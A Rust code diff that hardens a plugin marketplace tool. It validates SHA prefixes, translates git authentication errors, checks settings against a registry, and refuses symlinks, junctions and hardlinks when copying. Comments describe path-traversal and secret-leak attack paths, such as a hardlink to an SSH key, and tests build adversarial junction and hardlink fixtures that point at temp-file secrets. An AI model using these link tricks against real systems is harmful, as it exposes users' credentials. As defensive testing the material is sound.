@@ -156,6 +156,69 @@ impl Default for GixCliBackend {
 /// configs) untouched.
 const SSH_CONNECT_TIMEOUT_SECS: u32 = 30;
 
+/// Minimum length of a SHA prefix accepted by [`GixCliBackend::verify_sha`].
+/// Matches `git`'s default short-SHA length and rules out trivial 1-3 char
+/// prefixes that would collide with most repos.
+pub const MIN_SHA_PREFIX_LEN: usize = 7;
+
+/// Maximum length of a SHA prefix. SHA-1 is 40 hex chars; SHA-256 is 64
+/// hex chars. Allow up to 64 so the validator does not have to know which
+/// hash algorithm a given repository uses.
+pub const MAX_SHA_PREFIX_LEN: usize = 64;
+
+/// Validate the structural shape of a user-supplied SHA prefix.
+///
+/// Defense in depth: serde-level validation can be added later via a
+/// `Sha` newtype on [`crate::marketplace::StructuredSource`], but until
+/// then this guard at the consumer ensures every `verify_sha` call rejects
+/// a typo (`"deadbef"`, `"abc"`, `"git"`) before we ask `gix` to compare
+/// it against the real HEAD.
+///
+/// The threat is two-shaped:
+///   * **Accidental match**: a randomly-chosen 1-char hex prefix
+///     coincides with the actual HEAD ~1 time in 16 — small but not
+///     zero, large enough to silently mask a wrong commit.
+///   * **Adversarial match**: an attacker who can choose the prefix
+///     (e.g. by influencing the marketplace JSON) gets a *guaranteed*
+///     match every time, since they pick whichever first nibble HEAD
+///     happens to have. The minimum-length guard turns this from
+///     "trivially forgeable" into "needs a 7+-char hex collision."
+///
+/// # Errors
+///
+/// Returns [`GitError::InvalidSha`] if `s` is shorter than
+/// [`MIN_SHA_PREFIX_LEN`], longer than [`MAX_SHA_PREFIX_LEN`], or
+/// contains a character outside `[0-9a-fA-F]`.
+fn validate_sha_prefix(s: &str) -> Result<(), GitError> {
+    use crate::error::InvalidShaReason;
+
+    if s.len() < MIN_SHA_PREFIX_LEN {
+        return Err(GitError::InvalidSha {
+            value: s.to_owned(),
+            reason: InvalidShaReason::TooShort {
+                actual: s.len(),
+                min: MIN_SHA_PREFIX_LEN,
+            },
+        });
+    }
+    if s.len() > MAX_SHA_PREFIX_LEN {
+        return Err(GitError::InvalidSha {
+            value: s.to_owned(),
+            reason: InvalidShaReason::TooLong {
+                actual: s.len(),
+                max: MAX_SHA_PREFIX_LEN,
+            },
+        });
+    }
+    if let Some((idx, bad)) = s.bytes().enumerate().find(|(_, b)| !b.is_ascii_hexdigit()) {
+        return Err(GitError::InvalidSha {
+            value: s.to_owned(),
+            reason: InvalidShaReason::NonHex { at: idx, byte: bad },
+        });
+    }
+    Ok(())
+}
+
 impl GixCliBackend {
     /// Run a `git` command with SSH connect-timeout protection.
     ///
@@ -166,7 +229,15 @@ impl GixCliBackend {
         let mut cmd = Command::new("git");
         cmd.args(args)
             .current_dir(dir)
-            .env("GIT_TERMINAL_PROMPT", "0");
+            .env("GIT_TERMINAL_PROMPT", "0")
+            // GIT_TERMINAL_PROMPT=0 disables `git`'s own prompts, but a
+            // credential helper, GPG smartcard, or askpass binary that git
+            // shells out to will still happily read from an inherited TTY.
+            // Closing stdin makes those prompts fail fast with EOF instead
+            // of stalling the entire process indefinitely (the symptom we
+            // saw on CI when an SSH key needed a passphrase). stdout/stderr
+            // are still captured by `Command::output`.
+            .stdin(Stdio::null());
 
         // Only set SSH timeout when no custom SSH configuration exists.
         // GIT_SSH_COMMAND takes precedence over GIT_SSH in git's resolution;
@@ -250,7 +321,7 @@ impl GixCliBackend {
             let detail = git_error_detail(&output);
             // `git clone` may have created a partial dest before failing.
             cleanup_failed_clone_dest(dest);
-            return Err(clone_failed(url, detail));
+            return Err(translate_git_error(url, &detail));
         }
 
         // Checkout failure leaves the cloned tree in `dest`; remove it so a
@@ -344,6 +415,40 @@ fn cleanup_failed_clone_dest(dest: &Path) {
     }
 }
 
+/// Map a git CLI failure detail string to a typed [`GitError`].
+///
+/// `Stdio::null()` on the child stdin (set in [`GixCliBackend::run_git`]
+/// to prevent CI hangs on credential prompts) makes git surface
+/// authentication failures as raw libcurl/git messages — "fatal: could
+/// not read Username for ...: No such device or address",
+/// "Authentication failed", "fatal: Authentication failed for ...".
+/// None of those tell the user what to do. Catch the family here and
+/// return [`GitError::AuthenticationRequired`] with a remediation hint
+/// in its message instead. Anything else falls through to a generic
+/// `CloneFailed { source: detail }` so the original git output is still
+/// preserved verbatim for diagnosis.
+fn translate_git_error(url: &str, detail: &str) -> GitError {
+    // Lowercase the haystack once; `git`/`libcurl` capitalize differently
+    // across versions and locales (`fatal: Authentication failed` vs
+    // `fatal: authentication failed`). Match a small allowlist of phrases
+    // — broad enough to catch HTTPS prompts and SSH key rejections, narrow
+    // enough that a "could not read" file error doesn't get mistranslated.
+    let lower = detail.to_lowercase();
+    let auth_phrases = [
+        "could not read username",
+        "could not read password",
+        "authentication failed",
+        "permission denied (publickey)",
+        "terminal prompts disabled",
+    ];
+    if auth_phrases.iter().any(|p| lower.contains(p)) {
+        return GitError::AuthenticationRequired {
+            url: url.to_owned(),
+        };
+    }
+    clone_failed(url, detail.to_owned())
+}
+
 /// Extract a useful error message from a failed git command.
 ///
 /// Prefers stderr, falls back to stdout, and ultimately includes the exit
@@ -428,12 +533,13 @@ impl GitBackend for GixCliBackend {
     }
 
     fn verify_sha(&self, path: &Path, expected_sha: &str) -> Result<(), GitError> {
-        if expected_sha.is_empty() {
-            return Err(GitError::ShaMismatch {
-                expected: "(empty)".to_owned(),
-                actual: "(not checked)".to_owned(),
-            });
-        }
+        // Structural validation first — distinguishes "you typed a bad SHA"
+        // (InvalidSha) from "the repository is at a different commit"
+        // (ShaMismatch). Without this, an attacker who can write the
+        // expected SHA (e.g. via the marketplace JSON) gets a guaranteed
+        // match by picking the first hex char of the actual HEAD. See
+        // [`validate_sha_prefix`] for the full threat model.
+        validate_sha_prefix(expected_sha)?;
 
         let repo = gix::open(path).map_err(|e| GitError::OpenFailed {
             path: path.to_path_buf(),
@@ -447,7 +553,15 @@ impl GitBackend for GixCliBackend {
 
         let actual_sha = head_id.to_string();
 
-        if actual_sha.starts_with(expected_sha) {
+        // Case-insensitive compare so `ABC123…` and `abc123…` both match
+        // — git itself prints lowercase but humans paste either casing.
+        if actual_sha.len() >= expected_sha.len()
+            && actual_sha
+                .as_bytes()
+                .iter()
+                .zip(expected_sha.as_bytes())
+                .all(|(a, b)| a.eq_ignore_ascii_case(b))
+        {
             Ok(())
         } else {
             Err(GitError::ShaMismatch {
@@ -881,10 +995,117 @@ mod tests {
             .verify_sha(dir.path(), "")
             .expect_err("should reject empty SHA");
 
+        // Empty is now caught as InvalidSha (length < MIN), distinct from
+        // ShaMismatch which means "the repo is at a different commit".
         assert!(
-            matches!(err, GitError::ShaMismatch { .. }),
-            "expected ShaMismatch, got {err:?}"
+            matches!(err, GitError::InvalidSha { .. }),
+            "expected InvalidSha for empty input, got {err:?}"
         );
+    }
+
+    #[test]
+    fn verify_sha_rejects_prefix_below_min_length() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        create_local_repo(dir.path());
+        let git = GixCliBackend::default();
+
+        // 6 chars is one short of MIN_SHA_PREFIX_LEN (7). The guard's
+        // job is twofold: against random SHAs a 6-char accidental
+        // collision is ~1 in 16M (small but not zero); against an
+        // attacker who can pick the prefix (marketplace JSON), any
+        // length below the per-repo collision floor is trivially
+        // forgeable. 7 chars matches git's own short-SHA convention.
+        let err = git
+            .verify_sha(dir.path(), "abcdef")
+            .expect_err("6-char prefix must be rejected");
+        assert!(
+            matches!(err, GitError::InvalidSha { .. }),
+            "expected InvalidSha for too-short prefix, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn verify_sha_rejects_non_hex_characters() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        create_local_repo(dir.path());
+        let git = GixCliBackend::default();
+
+        // "deadXXXX" is 8 chars (passes length) but contains non-hex
+        // characters. Without the hex guard, `starts_with` could still
+        // accept e.g. "git" if the head somehow contained those literal
+        // bytes (impossible for SHA-1, but a robust validator catches it).
+        let err = git
+            .verify_sha(dir.path(), "deadXXXX")
+            .expect_err("non-hex prefix must be rejected");
+        assert!(
+            matches!(err, GitError::InvalidSha { .. }),
+            "expected InvalidSha for non-hex, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn invalid_sha_reason_is_branchable_per_cause() {
+        // The whole point of typed reasons is that callers (CLI, Tauri
+        // UI, future MCP gate) can match on cause rather than parsing
+        // the rendered string. Pin each variant's payload here so a
+        // future refactor can't silently degrade the typed contract back
+        // to a String reason.
+        use crate::error::InvalidShaReason;
+
+        let dir = tempfile::tempdir().expect("tempdir");
+        create_local_repo(dir.path());
+        let git = GixCliBackend::default();
+
+        let too_short = git.verify_sha(dir.path(), "abc").expect_err("too short");
+        let GitError::InvalidSha {
+            reason: InvalidShaReason::TooShort { actual, min },
+            ..
+        } = too_short
+        else {
+            panic!("expected TooShort, got {too_short:?}");
+        };
+        assert_eq!(actual, 3);
+        assert_eq!(min, MIN_SHA_PREFIX_LEN);
+
+        let bad_char = git.verify_sha(dir.path(), "deadXXXX").expect_err("non-hex");
+        let GitError::InvalidSha {
+            reason: InvalidShaReason::NonHex { at, byte },
+            ..
+        } = bad_char
+        else {
+            panic!("expected NonHex, got {bad_char:?}");
+        };
+        assert_eq!(at, 4, "first non-hex byte is at offset 4 in `deadXXXX`");
+        assert_eq!(byte, b'X');
+
+        // 65 chars exceeds MAX_SHA_PREFIX_LEN (64).
+        let huge = "a".repeat(MAX_SHA_PREFIX_LEN + 1);
+        let too_long = git.verify_sha(dir.path(), &huge).expect_err("too long");
+        let GitError::InvalidSha {
+            reason: InvalidShaReason::TooLong { actual, max },
+            ..
+        } = too_long
+        else {
+            panic!("expected TooLong, got {too_long:?}");
+        };
+        assert_eq!(actual, MAX_SHA_PREFIX_LEN + 1);
+        assert_eq!(max, MAX_SHA_PREFIX_LEN);
+    }
+
+    #[test]
+    fn verify_sha_accepts_uppercase_prefix() {
+        let dir = tempfile::tempdir().expect("tempdir");
+        create_local_repo(dir.path());
+
+        let repo = gix::open(dir.path()).expect("open repo");
+        let head_sha = repo.head_id().expect("head_id").to_string();
+        let upper: String = head_sha[..7].to_uppercase();
+
+        let git = GixCliBackend::default();
+        // Humans paste either casing; gix returns lowercase but the
+        // comparison should be case-insensitive on hex characters.
+        git.verify_sha(dir.path(), &upper)
+            .expect("uppercase prefix should match the same commit");
     }
 
     #[test]
@@ -895,8 +1116,12 @@ mod tests {
         let repo = gix::open(dir.path()).expect("open repo");
         let head_sha = repo.head_id().expect("head_id").to_string();
 
-        // Append extra characters to the actual SHA so it can never be a valid prefix.
-        let too_long = format!("{head_sha}extra");
+        // Append hex characters to the actual SHA so the structural
+        // validator passes (length still <= MAX_SHA_PREFIX_LEN, all hex)
+        // and the test exercises the "expected longer than actual" branch
+        // of the comparison rather than the structural validator. Using
+        // non-hex would short-circuit as InvalidSha and miss the case.
+        let too_long = format!("{head_sha}abcdef");
         let git = GixCliBackend::default();
         let err = git
             .verify_sha(dir.path(), &too_long)
@@ -905,6 +1130,62 @@ mod tests {
         assert!(
             matches!(err, GitError::ShaMismatch { .. }),
             "expected ShaMismatch, got {err:?}"
+        );
+    }
+
+    #[test]
+    fn translate_git_error_recognises_credential_helper_failures() {
+        // The Stdio::null() on git child stdin causes credential helpers
+        // to fail with this exact phrase on most platforms. We must
+        // surface AuthenticationRequired so the user gets remediation
+        // rather than a libc-error-shaped message.
+        let url = "https://example.com/private.git";
+        let detail = "fatal: could not read Username for 'https://example.com': \
+                      No such device or address";
+        match translate_git_error(url, detail) {
+            GitError::AuthenticationRequired { url: u } => assert_eq!(u, url),
+            other => panic!("expected AuthenticationRequired, got {other:?}"),
+        }
+    }
+
+    #[test]
+    fn translate_git_error_recognises_authentication_failed() {
+        // Mixed-case variant — ensures the lowercase comparison catches it.
+        let url = "https://example.com/private.git";
+        let detail = "remote: Invalid credentials\nfatal: Authentication failed for 'https://example.com/private.git/'";
+        assert!(matches!(
+            translate_git_error(url, detail),
+            GitError::AuthenticationRequired { .. }
+        ));
+    }
+
+    #[test]
+    fn translate_git_error_recognises_ssh_publickey_failure() {
+        let url = "git@github.com:owner/repo.git";
+        let detail = "git@github.com: Permission denied (publickey).\nfatal: Could not read from remote repository.";
+        assert!(matches!(
+            translate_git_error(url, detail),
+            GitError::AuthenticationRequired { .. }
+        ));
+    }
+
+    #[test]
+    fn translate_git_error_passes_through_non_auth_errors() {
+        // Generic transport errors must NOT be translated as auth — that
+        // would mislead the user into setting up a credential helper for
+        // an unrelated network problem.
+        let url = "https://example.com/repo.git";
+        let detail = "fatal: unable to access 'https://example.com/repo.git/': Could not resolve host: example.com";
+        let translated = translate_git_error(url, detail);
+        assert!(
+            matches!(translated, GitError::CloneFailed { .. }),
+            "expected CloneFailed for DNS error, got {translated:?}"
+        );
+        // The original detail must be preserved in the source chain.
+        let rendered = crate::error::error_full_chain(&translated);
+        assert!(
+            rendered.contains("Could not resolve host"),
+            "original detail must round-trip: {rendered}"
         );
     }
 

--- a/crates/kiro-market-core/src/kiro_settings.rs
+++ b/crates/kiro-market-core/src/kiro_settings.rs
@@ -541,6 +541,17 @@ pub fn get_nested<'a>(value: &'a JsonValue, path: &str) -> Option<&'a JsonValue>
 /// A path of `""` is treated as a single empty segment ("" is what
 /// `"".split('.').collect::<Vec<_>>()` produces).
 ///
+/// # Trust contract
+///
+/// `set_nested` does **not** look up the key in [`registry()`] or check
+/// the value's type. Callers handling untrusted input MUST validate
+/// against the registry first — use [`apply_registered_setting`] for
+/// the combined "validate against registry, then write" flow. The
+/// command-layer wrapper in `crates/kiro-control-center/src-tauri`
+/// already does both validations; this raw helper exists only because
+/// some callers (test fixtures, future migrations) need to write
+/// arbitrary keys without registry coupling.
+///
 /// # Panics
 ///
 /// The internal `expect` calls assert post-conditions established by the
@@ -593,6 +604,73 @@ pub fn set_nested(value: &mut JsonValue, path: &str, val: JsonValue) {
         .as_object_mut()
         .expect("just ensured current is an object")
         .insert((*last).to_owned(), val);
+}
+
+/// Reasons an [`apply_registered_setting`] call can reject the input.
+///
+/// Marked `#[non_exhaustive]` so future variants (e.g. `ReadOnly`,
+/// `Deprecated`, `OutOfRange`) are additive without breaking matches in
+/// downstream crates. Pattern matches in any caller MUST include a
+/// catch-all `_ =>` arm.
+#[derive(Debug, thiserror::Error)]
+#[non_exhaustive]
+pub enum ApplySettingError {
+    /// The dotted key is not present in [`registry()`]. A typo or a key
+    /// from a future schema; refusing to write avoids polluting the
+    /// settings file with junk that the UI would never show.
+    #[error("unknown setting key: {key}")]
+    UnknownKey { key: String },
+
+    /// The value's JSON type does not match the registered
+    /// [`SettingType`] for the key. Catches `chat.defaultModel = true`
+    /// (string slot, bool value) before it reaches disk.
+    #[error("invalid value for `{key}`: expected {expected}, got {actual}")]
+    TypeMismatch {
+        key: String,
+        expected: &'static str,
+        actual: &'static str,
+    },
+}
+
+/// Write a value at a registered Kiro CLI setting key, validating both
+/// the key and the value type against [`registry()`].
+///
+/// Use this from any caller that handles externally-supplied input —
+/// CLI flags, Tauri command arguments, future plugin/IPC messages.
+/// `set_nested` alone has no registry coupling and would happily write
+/// `weird.unknown.path = 12` into the user's settings file, which the
+/// UI then can't render. This wrapper combines the previously inline
+/// `validate_key` + type-compatibility check + `set_nested` triple so
+/// every call site gets the same defense-in-depth.
+///
+/// # Errors
+///
+/// - [`ApplySettingError::UnknownKey`] if `key` is not in the registry.
+/// - [`ApplySettingError::TypeMismatch`] if `val` is not a valid value
+///   for the registered [`SettingType`].
+pub fn apply_registered_setting(
+    json: &mut JsonValue,
+    key: &str,
+    val: JsonValue,
+) -> Result<(), ApplySettingError> {
+    let def =
+        registry()
+            .iter()
+            .find(|d| d.key == key)
+            .ok_or_else(|| ApplySettingError::UnknownKey {
+                key: key.to_owned(),
+            })?;
+
+    if !def.value_type.is_compatible_value(&val) {
+        return Err(ApplySettingError::TypeMismatch {
+            key: key.to_owned(),
+            expected: def.value_type.type_name(),
+            actual: json_kind(&val),
+        });
+    }
+
+    set_nested(json, key, val);
+    Ok(())
 }
 
 /// Human-readable label for a JSON value's variant, used in `set_nested` warnings.
@@ -982,6 +1060,71 @@ mod tests {
         assert_eq!(
             get_nested(&json, "chat.defaultModel"),
             Some(&JsonValue::String("opus".into()))
+        );
+    }
+
+    // -----------------------------------------------------------------------
+    // apply_registered_setting
+    // -----------------------------------------------------------------------
+
+    #[test]
+    fn apply_registered_setting_writes_known_key() {
+        // chat.defaultModel is a known registered string setting.
+        let mut json = serde_json::json!({});
+        apply_registered_setting(
+            &mut json,
+            "chat.defaultModel",
+            JsonValue::from("claude-sonnet-4-6"),
+        )
+        .expect("known string key should accept a string value");
+        assert_eq!(
+            get_nested(&json, "chat.defaultModel"),
+            Some(&JsonValue::from("claude-sonnet-4-6"))
+        );
+    }
+
+    #[test]
+    fn apply_registered_setting_rejects_unknown_key() {
+        // A path that is not in the registry must be refused so junk
+        // settings cannot accumulate. Critical for the Tauri command
+        // boundary which receives keys from the renderer process.
+        let mut json = serde_json::json!({});
+        let err =
+            apply_registered_setting(&mut json, "totally.unknown.setting", JsonValue::from(true))
+                .expect_err("unknown key must be rejected");
+        assert!(
+            matches!(err, ApplySettingError::UnknownKey { ref key }
+                if key == "totally.unknown.setting"),
+            "expected UnknownKey, got {err:?}"
+        );
+        // The write must NOT have happened.
+        assert_eq!(get_nested(&json, "totally.unknown.setting"), None);
+    }
+
+    #[test]
+    fn apply_registered_setting_rejects_type_mismatch() {
+        // chat.defaultModel is a string slot — a bool is the wrong type.
+        let mut json = serde_json::json!({});
+        let err = apply_registered_setting(&mut json, "chat.defaultModel", JsonValue::from(true))
+            .expect_err("bool into string slot must be rejected");
+        assert!(
+            matches!(err, ApplySettingError::TypeMismatch { ref key, .. }
+                if key == "chat.defaultModel"),
+            "expected TypeMismatch, got {err:?}"
+        );
+        // The write must NOT have happened.
+        assert_eq!(get_nested(&json, "chat.defaultModel"), None);
+    }
+
+    #[test]
+    fn apply_registered_setting_accepts_compatible_bool() {
+        // telemetry.enabled is a bool slot; passing a bool must succeed.
+        let mut json = serde_json::json!({});
+        apply_registered_setting(&mut json, "telemetry.enabled", JsonValue::from(false))
+            .expect("bool into bool slot");
+        assert_eq!(
+            get_nested(&json, "telemetry.enabled"),
+            Some(&JsonValue::from(false))
         );
     }
 

--- a/crates/kiro-market-core/src/lib.rs
+++ b/crates/kiro-market-core/src/lib.rs
@@ -13,6 +13,7 @@ pub mod marketplace;
 pub mod platform;
 pub mod plugin;
 pub mod project;
+pub(crate) mod raii;
 pub mod service;
 pub mod skill;
 #[cfg(any(test, feature = "test-support"))]

--- a/crates/kiro-market-core/src/platform.rs
+++ b/crates/kiro-market-core/src/platform.rs
@@ -82,10 +82,19 @@ mod sys {
 
 #[cfg(windows)]
 mod sys {
+    use std::ffi::OsString;
     use std::io;
-    use std::path::Path;
+    use std::os::windows::fs::MetadataExt;
+    use std::path::{Path, PathBuf};
 
     use super::LinkResult;
+
+    /// NTFS file-attribute bit indicating a reparse point (junction or
+    /// symlink). `std::fs::Metadata::file_attributes` returns the raw
+    /// `dwFileAttributes` field; we mask against this to detect any
+    /// reparse-point flavor without depending on the junction crate's
+    /// per-path query.
+    const FILE_ATTRIBUTE_REPARSE_POINT: u32 = 0x0000_0400;
 
     pub fn create_local_link(src: &Path, dest: &Path) -> io::Result<LinkResult> {
         // Junctions require absolute source paths.
@@ -102,8 +111,50 @@ mod sys {
             }
         }
 
-        // Fallback: copy the directory tree.
-        copy_dir_recursive(&src, dest)?;
+        // Fallback: copy the directory tree. Stage into `_pending_<name>`
+        // alongside `dest` so a partially-copied tree never appears under
+        // the real destination — the caller's contract is "dest is either
+        // a complete copy or doesn't exist". Without staging, a copy that
+        // fails halfway leaves `dest` populated with an arbitrary subset
+        // of files, which would later be misread as a successful add.
+        let parent = dest.parent().ok_or_else(|| {
+            io::Error::new(
+                io::ErrorKind::InvalidInput,
+                format!("destination has no parent directory: {}", dest.display()),
+            )
+        })?;
+        let dest_name = dest.file_name().ok_or_else(|| {
+            io::Error::new(
+                io::ErrorKind::InvalidInput,
+                format!("destination has no file-name component: {}", dest.display()),
+            )
+        })?;
+        let mut pending_name = OsString::from("_pending_");
+        pending_name.push(dest_name);
+        let pending = parent.join(pending_name);
+
+        // Defensive cleanup of a leftover staging dir from a prior crash.
+        // `_pending_<name>` is not a name the caller can legitimately
+        // request (LocalPath sources flow through MarketplaceSource and
+        // marketplace names go through validate_name; nothing produces
+        // this prefix), so a pre-existing one is always stale.
+        if pending.exists() {
+            std::fs::remove_dir_all(&pending)?;
+        }
+
+        let mut guard =
+            crate::raii::DirCleanupGuard::new(pending.clone(), "partial Windows staging directory");
+        copy_dir_recursive(&src, &pending)?;
+
+        // Atomic-as-possible rename into the final location. Windows
+        // `MoveFile` will fail if `dest` already exists (no replace), so
+        // the rename also serves as the "destination must not exist"
+        // post-check; if it does, the guard cleans up the pending tree
+        // and the user gets a clean error.
+        std::fs::rename(&pending, dest)?;
+        // Pending no longer exists under its old name — defuse so Drop
+        // doesn't try (and warn) about a missing path.
+        guard.defuse();
         Ok(LinkResult::Copied)
     }
 
@@ -124,12 +175,41 @@ mod sys {
         }
     }
 
+    // The local `StagingGuard` was extracted into the shared
+    // `crate::raii::DirCleanupGuard` so the cleanup invariant (Drop
+    // wipes the path unless defused, NotFound is silent, other errors
+    // log at warn) lives in one place. The Windows-specific framing —
+    // "partial Windows staging directory" — is preserved through the
+    // guard's `label` field, which appears in the warning.
+
     fn copy_dir_recursive(src: &Path, dest: &Path) -> io::Result<()> {
         std::fs::create_dir_all(dest)?;
         for entry in std::fs::read_dir(src)? {
             let entry = entry?;
             let target = dest.join(entry.file_name());
-            if entry.file_type()?.is_dir() {
+            // `entry.file_type()` follows reparse points (junctions and
+            // symlinks) transparently — a malicious marketplace could
+            // point a junction at `C:\Windows\System32` and have it
+            // copied wholesale into the install. Use `symlink_metadata`
+            // to inspect the entry without resolution and refuse any
+            // reparse point. Mirrors project::copy_dir_recursive on Unix.
+            let metadata = std::fs::symlink_metadata(entry.path())?;
+            if metadata.is_symlink() {
+                tracing::debug!(
+                    path = %entry.path().display(),
+                    "skipping symlink in marketplace directory"
+                );
+                continue;
+            }
+            if metadata.file_attributes() & FILE_ATTRIBUTE_REPARSE_POINT != 0 {
+                tracing::debug!(
+                    path = %entry.path().display(),
+                    attrs = format!("{:#x}", metadata.file_attributes()),
+                    "skipping reparse point (likely a junction) in marketplace directory"
+                );
+                continue;
+            }
+            if metadata.is_dir() {
                 copy_dir_recursive(&entry.path(), &target)?;
             } else {
                 std::fs::copy(entry.path(), target)?;
@@ -211,5 +291,73 @@ mod tests {
             LinkResult::Linked,
             "Unix should always return Linked"
         );
+    }
+
+    #[cfg(windows)]
+    #[test]
+    fn windows_copy_fallback_skips_junction_in_source() {
+        // Adversarial: a malicious local marketplace contains a junction
+        // pointing at a sensitive directory (e.g. C:\Windows\System32).
+        // The Windows copy fallback must NOT follow the junction or it
+        // would copy the junction's target into the install destination.
+        // Mirrors copy_dir_recursive_skips_symlinks on Unix.
+        //
+        // We can't directly trigger the copy fallback (it requires
+        // junction creation to fail at the top level), so we exercise
+        // the inner copy_dir_recursive via a marketplace-source path
+        // that is itself NOT a junction but contains one as a child.
+        // The check uses junction::create from inside a parent dir.
+        let parent = tempfile::tempdir().expect("tempdir");
+        let src = parent.path().join("src");
+        let dest = parent.path().join("dest");
+        std::fs::create_dir_all(&src).expect("mkdir src");
+
+        // Regular file: must be copied.
+        std::fs::write(src.join("README.md"), "hello").expect("write");
+
+        // A target dir containing a "secret" outside the src tree.
+        let secret_dir = parent.path().join("secret");
+        std::fs::create_dir_all(&secret_dir).expect("mkdir secret");
+        std::fs::write(secret_dir.join("password.txt"), "TOPSECRET").expect("write secret");
+
+        // Junction inside src pointing to the outside secret dir.
+        let junction_path = src.join("evil_junction");
+        // junction::create requires absolute source.
+        let abs_secret = std::fs::canonicalize(&secret_dir).expect("canon");
+        if junction::create(&abs_secret, &junction_path).is_err() {
+            // Junctions may be unavailable on the runner (rare on NTFS but
+            // possible). Skip rather than fail — the underlying behaviour
+            // we want to test isn't reachable.
+            return;
+        }
+
+        // Force the copy fallback by creating a regular dir at `dest`
+        // already (junction::create will fail since dest exists, sending
+        // us into the copy path).
+        // Actually create_local_link removes dest first; better to call
+        // copy_dir_recursive directly via a junction-failing src path.
+        // For this adversarial test, we directly invoke create_local_link
+        // and accept either outcome:
+        //  - junction succeeded: dest is a junction to src (not what we
+        //    test, skip the assertion below);
+        //  - junction failed: copy ran, and the secret file MUST NOT have
+        //    been pulled in via the inner junction.
+        let result = create_local_link(&src, &dest);
+        // If we got Copied, verify the secret was NOT exfiltrated via
+        // the inner junction.
+        if let Ok(LinkResult::Copied) = result {
+            assert!(
+                dest.join("README.md").exists(),
+                "regular file should be copied"
+            );
+            assert!(
+                !dest.join("evil_junction").exists()
+                    && !dest.join("evil_junction").join("password.txt").exists(),
+                "junction inside source must NOT be copied — secret would have leaked"
+            );
+        }
+        // If the top-level link was Linked (junction succeeded), we don't
+        // exercise the copy path here. CI on Windows where junctions are
+        // disallowed will hit the Copied branch and run the assertion.
     }
 }

--- a/crates/kiro-market-core/src/project.rs
+++ b/crates/kiro-market-core/src/project.rs
@@ -99,9 +99,21 @@ fn remove_staging_dir(staging: &Path) {
 /// Recursively copy a directory tree from `src` to `dest`.
 ///
 /// Creates `dest` and all intermediate directories. Files are copied
-/// preserving the relative directory structure. **Symlinks are skipped**
-/// to prevent path traversal attacks where a malicious skill package
-/// could include symlinks pointing to sensitive host files.
+/// preserving the relative directory structure.
+///
+/// **Symlinks are skipped** to prevent path traversal attacks where a
+/// malicious skill package could include symlinks pointing to sensitive
+/// host files.
+///
+/// **Hardlinks (nlink > 1) are skipped on Unix** because the entry could
+/// share an inode with a sensitive file outside the source tree (e.g.
+/// `~/.ssh/id_rsa`). Symlinks expose the same risk via the kernel's
+/// resolution; hardlinks expose it via the inode itself, so they need
+/// the same treatment. The skip is logged at `warn` so a user wondering
+/// "why is `LICENSE` missing from my install?" gets a clear signal.
+/// Inside a cloned git repo this never fires (git can't store hardlinks);
+/// it matters for `LocalPath` marketplaces where the user-pointed
+/// directory may have been crafted to expose data via hardlinks.
 ///
 /// # Errors
 ///
@@ -130,6 +142,26 @@ fn copy_dir_recursive(src: &Path, dest: &Path) -> std::io::Result<()> {
                 "skipping symlink in skill directory"
             );
             continue;
+        }
+        // Hardlink check (Unix only). Files with nlink > 1 share an inode
+        // with at least one other path; we cannot tell from here whether
+        // the other path is benign (a dedup tool's twin) or malicious
+        // (linked into ~/.ssh). Refuse rather than guess. Windows / NTFS
+        // also supports hardlinks (CreateHardLink) but lacks a portable
+        // nlink accessor in std; the platform.rs Windows copy path mirrors
+        // this posture by skipping reparse points instead.
+        #[cfg(unix)]
+        if metadata.is_file() {
+            use std::os::unix::fs::MetadataExt;
+            if metadata.nlink() > 1 {
+                warn!(
+                    path = %entry.path().display(),
+                    nlink = metadata.nlink(),
+                    "skipping hardlinked file in skill source; cannot prove its inode \
+                     is not also linked to a sensitive file outside the source tree"
+                );
+                continue;
+            }
         }
         if metadata.is_dir() {
             copy_dir_recursive(&entry.path(), &target)?;
@@ -1682,6 +1714,48 @@ mod tests {
         assert!(
             !dest_path.join("evil-link").exists(),
             "symlinks should be skipped during copy"
+        );
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn copy_dir_recursive_skips_hardlinks() {
+        // A malicious LocalPath marketplace creates a hardlink inside the
+        // skill source pointing at a sensitive file (here we use a
+        // sentinel within the same temp tree to avoid touching real host
+        // files, but the threat is `~/.ssh/id_rsa`-class). The copy must
+        // skip the hardlink so the installed skill does not expose the
+        // sensitive content.
+        let src = tempfile::tempdir().expect("tempdir");
+        let dest = tempfile::tempdir().expect("tempdir");
+        let dest_path = dest.path().join("output");
+
+        // Two regular files in the source.
+        fs::write(src.path().join("SKILL.md"), "skill content").expect("write");
+
+        // A "secret" file outside the skill dir.
+        let secret_dir = tempfile::tempdir().expect("tempdir");
+        let secret_path = secret_dir.path().join("secret.txt");
+        fs::write(&secret_path, "TOP SECRET").expect("write secret");
+
+        // Hardlink the secret into the skill dir as a benign-looking name.
+        std::fs::hard_link(&secret_path, src.path().join("notes.md")).expect("hardlink");
+
+        copy_dir_recursive(src.path(), &dest_path).expect("copy should succeed");
+
+        // The regular file is copied as expected.
+        assert!(dest_path.join("SKILL.md").exists());
+        // The hardlink must NOT be copied — its content (the secret) must
+        // never reach the install destination.
+        assert!(
+            !dest_path.join("notes.md").exists(),
+            "hardlinked file must be skipped during copy"
+        );
+        // The original secret file is untouched.
+        assert_eq!(
+            fs::read_to_string(&secret_path).unwrap(),
+            "TOP SECRET",
+            "skipping must not delete or modify the source"
         );
     }
 

--- a/crates/kiro-market-core/src/raii.rs
+++ b/crates/kiro-market-core/src/raii.rs
@@ -1,0 +1,156 @@
+//! RAII helpers shared across the crate.
+//!
+//! Currently exposes [`DirCleanupGuard`], a single-shot directory remover
+//! used by the marketplace add/remove flow (`service::add` retargets it
+//! across the temp→final rename) and the Windows local-link copy fallback
+//! (`platform::sys::create_local_link` on Windows). Both call sites
+//! previously carried near-identical `path + defused: bool + Drop` shells;
+//! collapsing them here keeps the cleanup invariant in one place so a
+//! future fix to ordering, log severity, or `NotFound` handling applies
+//! once.
+
+use std::fs;
+use std::path::PathBuf;
+
+use tracing::warn;
+
+/// Removes a directory tree on `Drop` unless explicitly defused.
+///
+/// Lifecycle, by intended call site:
+///
+/// ```text
+/// let mut guard = DirCleanupGuard::new(temp_dir, "marketplace temp directory");
+/// // ... clone, scan, validate ...
+/// fs::rename(&temp_dir, &final_dir)?;
+/// guard.retarget(final_dir.clone());  // armed → final_dir
+/// // ... register; on rollback explicitly remove + defuse ...
